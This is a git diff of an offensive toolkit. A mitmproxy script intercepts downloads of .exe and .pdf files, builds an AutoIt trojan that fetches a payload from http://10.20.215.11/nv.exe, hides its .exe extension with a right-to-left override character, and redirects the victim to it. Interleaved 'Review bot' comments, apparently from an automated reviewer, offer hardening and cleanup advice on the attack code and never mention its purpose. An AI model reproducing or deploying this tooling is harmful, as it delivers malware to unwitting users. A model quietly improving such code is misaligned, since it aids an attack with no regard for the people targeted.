diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..0557015 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +trojan.txt diff --git a/Trojan.py b/Trojan.py index 990b422..d4335b5 100644 --- a/Trojan.py +++ b/Trojan.py @@ -4,11 +4,10 @@ import zipfile - TROJAN_SOURCE_CODE_FILE = "trojan.txt" AUT2EXE = "/root/.wine/drive_c/Program Files (x86)/AutoIt3/Aut2Exe/Aut2exe.exe" -trojan_code = """ +TROJAN_CODE = """ #include #include Local $urlsArray = StringSplit($urls, ",", 2 ) @@ -35,16 +34,15 @@ def __init__(self, url1, url2, icon, out_file): file_type = url1.split(".")[-1].replace("#", "") self.icon = self.set_icon(icon, file_type) self.out_file = out_file - - + def create(self): urls = 'Local $urls = "' + self.url1 + "," +self.url2 + '"\n' with open(TROJAN_SOURCE_CODE_FILE, "w") as trojan_file: - trojan_file.write(urls + trojan_code) + trojan_file.write(urls + TROJAN_CODE) def compile(self): subprocess.call('wine "' + AUT2EXE + '" /In "' + TROJAN_SOURCE_CODE_FILE + '" /Out "' + self.out_file +'" /Icon "' + self.icon + '"' , shell=True) - + def set_icon(self, icon, file_type): icons_directory = os.path.dirname(os.path.realpath(__file__)) + "/icons" if icon == None: @@ -52,11 +50,10 @@ def set_icon(self, icon, file_type): if not os.path.isfile(icon) : print("[-] Can't find icon at " + icon) - print("[-] Using generaic icon.") + print("[-] Using generic icon.") icon = icons_directory + "/generic.ico" return icon - def zip(self, file_to_zip): os.chdir(os.path.dirname(file_to_zip)) trojan_name = file_to_zip.split("/")[-1] diff --git a/__pycache__/Trojan.cpython-37.pyc b/__pycache__/Trojan.cpython-37.pyc new file mode 100644 index 0000000..5a342fa Binary files /dev/null and b/__pycache__/Trojan.cpython-37.pyc differ diff --git a/mitmproxy_script.py b/mitmproxy_script.py index 22e411e..cd1d279 100644 --- a/mitmproxy_script.py +++ b/mitmproxy_script.py 
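Review bot: The new `.gitignore` lists only `trojan.txt`, yet this same commit adds `__pycache__/Trojan.cpython-37.pyc` as a tracked binary. Compiled bytecode is a build artifact that cannot be reviewed in a diff and can drift from `Trojan.py`. I would drop the `.pyc` from the commit and add `__pycache__/` and `*.pyc` next to `trojan.txt`.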
@@ -1,44 +1,40 @@ import mitmproxy -import subprocess import os -from Trojan import * +from Trojan import Trojan IP = "10.20.215.11" TARGET_TEXTENSIONS = [".exe", ".pdf"] -EVIL_FILE = "http://10.20.215.11/nv.exe" +EVIL_FILE_URL = "http://10.20.215.11/nv.exe" WEB_ROOT = "/var/www/html/" SPOOF_EXTENSION = True def request(flow): #code to handle request flows - + if flow.request.host != IP and flow.request.pretty_url.endswith(tuple(TARGET_TEXTENSIONS)): print("[+] Got interesting flow") - + front_file_name = flow.request.pretty_url.split("/")[-1].split(".")[0] - front_file = flow.request.pretty_url + "#" - download_file_name = front_file_name + ".exe" - trojan_file = WEB_ROOT + download_file_name - + front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1] + + front_file_url = flow.request.pretty_url + "#" + trojan_file_name = front_file_name + ".exe" + download_file_name = trojan_file_name + if SPOOF_EXTENSION and front_file_extension != "exe": + print("[+] Renaming trojan to spoof its extension") + trojan_file_name = front_file_name + "\u202E" + "".join(reversed(front_file_extension)) + ".exe" + trojan_file = WEB_ROOT + trojan_file_name print("[+] Generating a trojan for " + flow.request.pretty_url) - trojan = Trojan(front_file, EVIL_FILE, None, trojan_file) + trojan = Trojan(front_file_url, EVIL_FILE_URL, None, trojan_file) trojan.create() trojan.compile() - if SPOOF_EXTENSION == True: - print("[+] Renaming trojan to spoof its extension") - front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1] - if front_file_extension != "exe": - new_name = front_file_name + "‮" + "".join(reversed(front_file_extension)) + ".exe" - spoofed_file = WEB_ROOT + new_name - os.rename(trojan_file, spoofed_file) - - trojan.zip(spoofed_file) - download_file_name = front_file_name + ".zip" - - - torjan_download_url = "http://" + IP + "/" + download_file_name - flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location": 
torjan_download_url}) + if SPOOF_EXTENSION: + trojan.zip(trojan_file) + download_file_name = front_file_name + ".zip" + + trojan_download_url = "http://" + IP + "/" + download_file_name + flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location": trojan_download_url}) diff --git a/trojan_factory.py b/trojan_factory.py index 621a617..f897e2e 100644 --- a/trojan_factory.py +++ b/trojan_factory.py @@ -1,7 +1,7 @@ #!/usr/bin/env python import optparse -from Trojan import * +from Trojan import Trojan parser = optparse.OptionParser() @@ -24,5 +24,5 @@ trojan.create() trojan.compile() -if options.zip: +if options.zip: trojan.zip(options.out_file_path)
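Review bot: `front_file_name` is taken straight from `flow.request.pretty_url` and concatenated into `trojan_file = WEB_ROOT + trojan_file_name` with no validation. That value is passed to `Trojan(...)` as `out_file`, and the `compile` method shown as context in the Trojan.py section splices `self.out_file` into a `subprocess.call(..., shell=True)` string. Characters chosen by whoever issues the request can therefore reach a shell and the filesystem on the host running the proxy. I would reject names outside a conservative set before building any path, e.g. `if not re.fullmatch(r"[A-Za-z0-9_-]+", front_file_name): return` (with `import re`), and have `compile` pass an argument list without `shell=True`. A short comment naming `"\u202E"` as U+202E RIGHT-TO-LEFT OVERRIDE would also keep that character visible to anyone auditing the file.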